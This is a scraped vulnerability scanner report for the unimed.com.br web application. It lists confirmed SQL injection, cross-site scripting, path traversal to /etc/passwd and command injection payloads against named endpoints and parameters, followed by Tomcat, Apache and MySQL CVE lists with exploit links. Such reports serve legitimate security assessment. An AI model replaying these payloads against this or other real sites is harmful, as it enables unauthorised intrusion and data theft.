Phishing, Insecure Configuration, XSS, Cross Site Scripting in unimed.com.br, CWE-79, CAPEC-86, DORK, GHDB ReportLoading
Netsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
35
identified
21
confirmed
3
critical
9
informational
|
||||||||
DORK SETTINGSScan Settings
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
CRITICAL
9 %
IMPORTANT
29 %
MEDIUM
11 %
LOW
26 %
INFORMATION
26 %
|
|
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do CONFIRMED |
| Parameter | Type | Value |
| acao | GET | inicial |
| cdComunicacao | GET | -1 OR 17-7=10 |
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do CONFIRMED |
| Parameter | Type | Value |
| acao | GET | inicial |
| cdComunicacao | GET | (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) |
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do |
| Parameter | Type | Value |
| acao | GET | inicial |
| cdComunicacao | GET | %27 |
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
|
- /pctr/layout/layout_2005/form_login.jsp
/pctr/layout/layout_2005/form_login.jsp CONFIRMED |
| Parameter | Type | Value |
| cd_canal | GET | '"--></style></script><script>alert(0x002E21)</script> |
| cd_secao | GET | null |
| seguro | GET | sim |
|
- /pct/index.jsp
/pct/index.jsp CONFIRMED |
| Parameter | Type | Value |
| cd_canal | GET | 54593 |
| cd_secao | GET | 60549 |
| codigoUnimed | GET | " stYle="x:expre/**/ssion(alert(9)) |
|
- /pctr/layout/layout_2005/form_login.jsp
/pctr/layout/layout_2005/form_login.jsp CONFIRMED |
| Parameter | Type | Value |
| cd_canal | GET | 54593 |
| cd_secao | GET | '"--></style></script><script>alert(0x002E34)</script> |
| seguro | GET | sim |
|
- /pct/index.jsp
/pct/index.jsp CONFIRMED |
| Parameter | Type | Value |
| cd_canal | GET | 54593 |
| cd_secao | GET | 54585 |
| listagem | GET | true |
| aprovadas | GET | ></script><script>alert(9)</script> |
|
- /pctr/layout/layout_2005/form_login.jsp
/pctr/layout/layout_2005/form_login.jsp CONFIRMED |
| Parameter | Type | Value |
| cd_canal | GET | '"--></style></script><script>alert(0x00363C)</script> |
|
- /pctr/servlet/NovoLoginUsuario
/pctr/servlet/NovoLoginUsuario CONFIRMED |
| Parameter | Type | Value |
| secao_ativa | POST | null |
| cd_canal | POST | '"--></style></script><script>alert(0x003817)</script> |
| kitsite | POST | null |
| ds_login | POST | 3 |
| ds_senha | POST | 3 |
|
- /pctr/servlet/NovoLoginUsuario
/pctr/servlet/NovoLoginUsuario CONFIRMED |
| Parameter | Type | Value |
| secao_ativa | POST | '"--></style></script><script>alert(0x0045C3)</script> |
| cd_canal | POST | 49146 |
| kitsite | POST | null |
| ds_login | POST | Usuário |
| mockpass | POST | Senha |
| ds_senha | POST | 3 |
|
- /pctr/servlet/NovoLoginUsuario
/pctr/servlet/NovoLoginUsuario CONFIRMED |
| Parameter | Type | Value |
| secao_ativa | POST | null |
| cd_canal | POST | 49146 |
| kitsite | POST | '"--></style></script><script>alert(0x004639)</script> |
| ds_login | POST | Usuário |
| mockpass | POST | Senha |
| ds_senha | POST | 3 |
|
- /pctr/servlet/NovoLoginUsuario
/pctr/servlet/NovoLoginUsuario CONFIRMED |
"/etc/password" file"/apache/logs/error.log" or "/apache/logs/access.log"|
- /Comunicacao/img.do
/Comunicacao/img.do CONFIRMED |
| Parameter | Type | Value |
| cdComunicacao | GET | ../../../../../../../../../../../etc/passwd |
If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing action of the HTTP code to steal the users password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
|
- /pctr/layout/layout_2005/form_login.jsp
/pctr/layout/layout_2005/form_login.jsp CONFIRMED |
|
- /pct/comum/redireciona.jsp
/pct/comum/redireciona.jsp |
| Parameter | Type | Value |
| cd_materia | GET | http://example.com/? ns: netsparker056650=vuln |
|
- /pctr/comum/redireciona.jsp
/pctr/comum/redireciona.jsp |
| Parameter | Type | Value |
| cd_materia | GET | http://example.com/? ns: netsparker056650=vuln |
|
- /crossdomain.xml
/crossdomain.xml CONFIRMED |
|
- /pct/corpo/2009-materia-plus/dialog/redes-sociais/mais_redes.jsp
/pct/corpo/2009-materia-plus/dialog/redes-sociais/mais_redes.jsp CONFIRMED |
autocomplete="off" to the form tag or to individual "input" fields.|
- /pctr/layout/layout_2005/form_login.jsp
/pctr/layout/layout_2005/form_login.jsp CONFIRMED |
|
- /portal/
/portal/ CONFIRMED |
SERVER header of its HTTP response.
|
- /portal/
/portal/ |
SERVER header of its HTTP response.
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do |
SERVER header of its HTTP response.
|
- /portal/
/portal/ |
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do |
| Parameter | Type | Value |
| acao | GET | inicial |
| cdComunicacao | GET | "& ping -n 26 127.0.0.1 & |
|
- /pct/index.jsp
/pct/index.jsp CONFIRMED |
<error-page>
<error-code>500</error-code>
<location>/server_error.html</location>
</error-page>
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do |
| Parameter | Type | Value |
| acao | GET | inicial |
| cdComunicacao | GET | "& ping -n 26 127.0.0.1 & |
|
- /pct/
/pct/ CONFIRMED |
|
- /Comunicacao/novo.do
/Comunicacao/novo.do CONFIRMED |
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do CONFIRMED |
|
- /pct/comum/js/myJsEvents.js
/pct/comum/js/myJsEvents.js |
Please upgrade your installation of Tomcat to the latest stable version.
Apache Tomcat Directory Listing Information Disclosure VulnerabilityApache Tomcat allows remote attackers to list directories via a semicolon (;) preceding a filename with a mapped extension, as demonstrated by URLs ending with /;index.jsp and /;help.do.
Apache Tomcat Simultaneous Directory Listing Denial Of Service VulnerabilityApache Tomcat allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
Apache Tomcat Cal2.JSP Cross-Site Scripting VulnerabilityCross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors.
Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure VulnerabilityThe default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
Apache Tomcat Cross-Site Scripting VulnerabilityCross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
Apache Tomcat SingleSignOn Remote Information Disclosure VulnerabilityThe SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
Apache Tomcat Accept-Language Cross Site Scripting VulnerabilityCross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
Apache Tomcat Directory Traversal VulnerabilityDirectory traversal vulnerability in Tomcat, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
http://www.securityfocus.com/bid/22960/exploit
Apache HTTP Request Smuggling VulnerabilitiesTomcat allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Tomcat to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting VulnerabilitiesMultiple cross-site scripting (XSS) vulnerabilities in the appdev/sample/web/hello.jsp example application in Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.23, and 6.0.0 through 6.0.10 allow remote attackers to inject arbitrary web script or HTML via the test parameter and unspecified vectors.
http://downloads.securityfocus.com/vulnerabilities/exploits/24058.html
Apache Tomcat JSP Example Web Applications Cross Site Scripting VulnerabilityMultiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the ';' character, as demonstrated by a URI containing a "snp/snoop.jsp;" sequence.
http://www.securityfocus.com/bid/24476/exploit
Apache Tomcat Cross-Site Scripting VulnerabilityMultiple cross-site scripting (XSS) vulnerabilities in the Manager and Host Manager web applications in Apache Tomcat allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
Apache Tomcat Multiple Remote Information Disclosure VulnerabilitiesApache Tomcat treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
http://www.securityfocus.com/bid/25316/exploit
Apache Tomcat Host Manager Servlet Cross Site Scripting VulnerabilityCross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
http://www.securityfocus.com/data/vulnerabilities/exploits/25314.html
Apache Tomcat Cookie Quote Handling Remote Information Disclosure VulnerabilityApache Tomcat does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.This issue exists because of an incomplete fix for CVE-2007-3385.
http://www.securityfocus.com/bid/27706/exploit
Apache Tomcat JULI Logging Component Default Security Policy VulnerabilityThe default catalina.policy in the JULI logging component in Apache Tomcat does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the level, directory, and prefix attributes in the org.apache.juli.FileHandler handler.
Apache Tomcat WebDav Remote Information Disclosure VulnerabilityAbsolute path traversal vulnerability in Apache Tomcat, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
http://www.securityfocus.com/bid/26070/exploit
Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting VulnerabilityCross-site scripting (XSS) vulnerability in Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
http://downloads.securityfocus.com/vulnerabilities/exploits/30496.txt
Apache Tomcat Host Manager Cross Site Scripting VulnerabilityCross-site scripting (XSS) vulnerability in Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
http://www.securityfocus.com/bid/29502/exploit
Apache Tomcat 'RequestDispatcher' Information Disclosure VulnerabilityApache Tomcat, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
http://www.securityfocus.com/bid/30494/exploit
Apache Tomcat 'RequestDispatcher' Information Disclosure VulnerabilityApache Tomcat, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
Apache Tomcat Java AJP Connector Invalid Header Denial of Service VulnerabilityApache Tomcat, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration WeaknessApache Tomcat, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the MemoryRealm, DataSourceRealm, and JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
http://www.metasploit.com/modules/auxiliary/scanner/http/tomcat_enum
Apache Tomcat Calendar Cross-Site ScriptingCross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
Apache Tomcat XML Parser Information Disclosure VulnerabilityApache Tomcat permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the web.xml, context.xml, or tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
Apache Tomcat WAR File Directory Traversal VulnerabilityDirectory traversal vulnerability in Apache Tomcat allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
Apache Tomcat Directory Host Appbase Authentication Bypass VulnerabilityThe autodeployment process in Apache Tomcat, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
Apache Tomcat Host Working Directory WAR File Directory Traversal VulnerabilityDirectory traversal vulnerability in Apache Tomcat allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
Apache Tomcat Windows Installer Insecure Password VulnerabilityThe Windows installer for Apache Tomcat, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
http://www.metasploit.com/modules/auxiliary/scanner/http/tomcat_mgr_login, http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy
Apache Tomcat SecurityManager Security Bypass VulnerabilityApache Tomcat, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service VulnerabilitiesApache Tomcat does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
http://www.metasploit.com/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding
Apache Tomcat Authentication Header Realm Name Information Disclosure VulnerabilityApache Tomcat might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires BASIC or DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
http://www.exploit-db.com/exploits/12343/
Apache Tomcat HTML Manager Interface HTML Injection VulnerabilityMultiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do |
Please upgrade your installation of Apache to the latest stable version.
Apache mod_cache and mod_dav Request Handling Denial of Service Vulnerability The mod_cache and mod_dav modules in the Apache HTTP Server allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
Apache APR-util apr_brigade_split_line() Denial of Service Vulnerability Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util), as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
Apache APR apr_fnmatch() Denial of Service VulnerabilityStack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
http://www.securityfocus.com/data/vulnerabilities/exploits/47820.txt
|
- /portal/
/portal/ |
Please upgrade your installation of MySQL to the latest stable version.
MySQL 'COM_FIELD_LIST' Command Buffer Overflow VulnerabilityBuffer overflow in MySQL allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.
MySQL 'COM_FIELD_LIST' Command Packet Security Bypass VulnerabilityDirectory traversal vulnerability in MySQL allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.
MySQL Malformed Packet Handling Remote Denial of Service VulnerabilityThe my_net_skip_rest function in sql/net_serv.cc in MySQL allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.
MySQL SELECT Statement DOS Vulnerabilitymysqld in MySQL properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
MySQL 'ALTER DATABASE' Remote Denial Of Service VulnerabilityMySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
MySQL Prior to 5.1.52 Multiple Denial Of Service VulnerabilitiesMySQL is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to crash the database, denying access to legitimate users. These issues affect versions prior to MySQL 5.1.52.
MySQL 'sql/sql_table.cc' CREATE TABLE Security Bypass VulnerabilityMySQL is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and gain access to table files created by other users.
MySQL Prior to 5.1.50 Privilege Escalation VulnerabilityMySQL is prone to a remote privilege-escalation vulnerability. An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system. This issue affects versions prior to MySQL 5.1.50.
MySQL Command Line Client HTML Special Characters HTML Injection Vulnerability MySQL is prone to an HTML-injection vulnerability because the application's command-line client fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
http://www.securityfocus.com/data/vulnerabilities/exploits/31486.txt
MySQL Multiple Denial of Service VulnerabilitiesSome vulnerabilities have been reported in MySQL, which can be exploited by malicious users to cause a DoS (Denial of Service).
MySQL Prior to 5.1.51 Multiple Denial Of Service VulnerabilitiesMySQL is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to crash the database, denying access to legitimate users. These issues affect versions prior to MySQL 5.1.51.
CVE-2010-3833, CVE-2010-3834, CVE-2010-3835, CVE-2010-3836, CVE-2010-3837, CVE-2010-3838, CVE-2010-3839, CVE-2010-3840
MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. Versions prior to MySQL 5.1.49 are vulnerable.
MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.
MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.
MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. Versions prior to MySQL 5.1.49 are vulnerable.
MySQL 'TEMPORARY InnoDB' Tables Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit these issues to crash the database, denying access to legitimate users. This issues affect versions prior to MySQL 5.1.49.
MySQL 'HANDLER' interface Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.
MySQL 'EXPLAIN' Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.
MySQL 'LOAD DATA INFILE' Denial Of Service VulnerabilityMySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.
MySQL DROP TABLE MyISAM Symbolic Link Local Security Bypass VulnerabilityOracle MySQL is prone to a security-bypass vulnerability. A local attacker can exploit this issue to delete data associated with arbitrary MyISAM tables. This may result in denial-of-service conditions. Versions prior to MySQL 5.1.46 are vulnerable.
MySQL with yaSSL SSL Certificate Handling Remote Stack Buffer Overflow VulnerabilityMySQL compiled with yaSSL is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. MySQL 5.5.0-ms2 is vulnerable when compiled with yaSSL; other versions may also be affected.
http://www.metasploit.com/modules/exploit/linux/mysql/mysql_yassl_getname
MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. This issue affects MySQL 5.1.23 and prior versions.
http://www.securityfocus.com/bid/26353/exploit
MySQL Rename Table Function Access Validation Vulnerability MySQL is prone to an access-validation vulnerability because it fails to perform adequate access control. Attackers can exploit this issue to rename arbitrary tables. This could result in denial-of-service conditions and may aid in other attacks. Versions prior to MySQL 4.1.23, 5.0.42, and 5.1.18 are vulnerable.
MySQL MERGE Privilege Revoke Bypass Vulnerability MySQL is prone to a vulnerability that allows users with revoked privileges to a particular table to access these tables without permission. Exploiting this issue allows attackers to access data when access privileges have been revoked. The specific impact of this issue depends on the data that the attacker may retrieve.
MySQL Mysql_real_escape Function SQL Injection Vulnerability MySQL is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise an application using a vulnerable database or to compromise the database itself. MySQL versions prior to 5.0.22-1-0.1 and prior to 4.1.20 are vulnerable. Other versions may also be affected.
MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities MySQL is prone to multiple remote vulnerabilities: 1. A buffer-overflow vulnerability occurs because the software fails to perform sufficient boundary checks of user-supplied data before copying it to an insufficiently sized memory buffer. This issue allows remote attackers to execute arbitrary machine code in the context of affected database servers. Failed exploit attempts will likely crash the server, denying further service to legitimate users. 2. Two information-disclosure vulnerabilities occur because the software fails to sufficiently sanitize and check boundaries of user-supplied data. These issues allow remote users to gain access to potentially sensitive information that may aid in further attacks.
http://www.securityfocus.com/bid/17780/exploit
MySQL Server Str_To_Date Remote Denial Of Service VulnerabilityMySQL is susceptible to a remote denial-of-service vulnerability. This issue is due to the database server's failure to properly handle unexpected input. This issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. Attackers may exploit this issue in conjunction with latent SQL-injection vulnerabilities in other applications. Versions of MySQL prior to 4.1.18, 5.0.19, and 5.1.6 are vulnerable to this issue.
MySQL Server Date_Format Denial Of Service VulnerabilityMySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. This issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. Attackers may exploit this issue in conjunction with latent SQL-injection vulnerabilities in other applications. Versions prior to MySQL 4.1.18, 5.0.19, and 5.1.6 are vulnerable.
MySQL INFORMATION_SCHEMA Remote Denial Of Service Vulnerability MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. An attacker can exploit this issue to crash the application, denying access to legitimate users. NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be done through legitimate means or by exploiting other latent SQL-injection vulnerabilities. This issue affects versions prior to MySQL 5.0.32 and 5.1.14.
http://www.securityfocus.com/bid/28351/exploit
MySQL Server Privilege Escalation And Denial Of Service Vulnerabilities MySQL is prone to multiple vulnerabilities, including privilege-escalation and denial-of-service issues. Exploiting the privilege-escalation vulnerability may allow attackers to perform certain actions with elevated privileges. Successful exploits of the denial-of-service issue will cause the database server to crash, denying service to legitimate users. These issues affect versions prior to MySQL 5.0.52, MySQL 5.1.23, and MySQL 6.0.4.
|
- /Comunicacao/detalhe.do
/Comunicacao/detalhe.do |
|
- /Comunicacao/img.do
/Comunicacao/img.do |
|
- /Comunicacao/busca.do
/Comunicacao/busca.do |